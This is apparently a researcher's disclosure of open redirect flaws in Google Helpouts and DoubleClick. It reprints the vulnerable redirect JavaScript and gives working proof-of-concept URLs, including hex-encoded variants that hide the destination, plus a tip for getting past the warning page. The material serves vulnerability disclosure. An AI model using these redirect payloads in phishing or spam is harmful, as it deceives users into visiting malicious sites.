For those who don't know what is a Open Redirect vulnerability, OWASP has a section about it (https://www.owasp.org/index.php/Open_redirect):
An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.Open Redirects are very attractive for spammers. Why? With the increasing importance of URL and domain reputation in SPAM filtering, spammers may not care so much about tricking the user into believing their link is secure, but they may care about filters not seeing their malicious websites.
# Google Helpouts
Proof-of-concept:
https://helpouts.google.com/opener?url=http://labs.davidsopas.comProof-of-concept with the URL encoded with hex with the same destination - http://labs.davidsopas.com:
https://helpouts.google.com/opener?url=%68%74%74%70%3A%2F%2F%6C%61%62%73%2E%64%61%76%69%64%73%6F%70%61%73%2E%63%6F%6D
# Google Doubleclick 1
Vulnerable code present on http://stats.g.doubleclick.net/u/post_iframe_dc.html:
(function() {
var b = decodeURIComponent;
var c = window,
d = function() {
var a = b(c.location.hash.substring(1));
/^https?\:\/\//.test(a) && c.location.replace(a)
},
e, f = c.XMLHttpRequest;
if ("undefined" != typeof f) e = new f;
else for (var g = ["MSXML2.XMLHTTP.6.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP"], h = 0; h < g.length; h++) try {
e = new c.ActiveXObject(g[h])
} catch (k) {}
(function(a) {
a ? (a.open("POST", ("https:" == c.location.protocol ? "https://stats.g.doubleclick.net" : "http://stats.g.doubleclick.net") + "/p/__utm.gif", !0), a.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), a.onreadystatechange = function() {
4 == a.readyState && d()
}, a.send(b(c.name))) : d()
})(e);
})();
Proof-of-concept:
http://stats.g.doubleclick.net/u/post_iframe_dc.html#http://labs.davidsopas.comProof-of-concept with the URL encoded with hex with the same destination - http://labs.davidsopas.com:
http://stats.g.doubleclick.net/u/post_iframe_dc.html#%68%74%74%70%3A%2F%2F%6C%61%62%73%2E%64%61%76%69%64%73%6F%70%61%73%2E%63%6F%6D# Google Doubleclick 2
This second open redirection works by adding the destination URL on adurl parameter.
You need a valid sig parameter but this value can be found by searching Google.
Proof-of-concept:
http://pubads.g.doubleclick.net/aclk?sa=L&ai=CVX_P9w1EUqOqEs-pigbasoH4BqTY8LkCAAAQASCUh8cWUO_F-bIDYO3c3IWYG8gBBOACAKgDAaoEWU_QCnBEa2tgTStWRYttDqi7d0s6uWsJDHSreAFvGE0ZiTo_mgVBIhLYaWniW4fUMgOpcXTUs_kxkhB8zkV9-z3LD9QNe14TSe7ZgNjja8PfgUFROjGNbD3N4AQBoAYV&num=0&sig=AOD64_1FE7vwsql9N-pKDvb9skYoC3ikrQ&client=&adurl=http://labs.davidsopas.comIf don't add a valid sig, it will warn the user before redirecting:
http://pubads.g.doubleclick.net/aclk?sa=L&ai=CVX_P9w1EUqOqEs-pigbasoH4BqTY8LkCAAAQASCUh8cWUO_F-bIDYO3c3IWYG8gBBOACAKgDAaoEWU_QCnBEa2tgTStWRYttDqi7d0s6uWsJDHSreAFvGE0ZiTo_mgVBIhLYaWniW4fUMgOpcXTUs_kxkhB8zkV9-z3LD9QNe14TSe7ZgNjja8PfgUFROjGNbD3N4AQBoAYV&num=0&sig=&client=&adurl=http://labs.davidsopas.comWhat risks poses these security issues to a user?
- Phishing: The user may be confronted to phishing attempts by being redirected to an untrusted page
- Spreading malware: The user may be redirected to an untrusted page that contains malware which may then compromise user information
- CSRF: Using a URL specially crafted to explore a Cross-site request forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) on Google
Google doesn't reward or fix this issues. They believe the usability and security benefits of a well-implemented and carefully monitored URL redirector tend to outweigh the perceived risks.
Personally I don't understand why Google don't follow the same steps than other companies, like Facebook and Yahoo, which give the right credit to Open Redirect issues.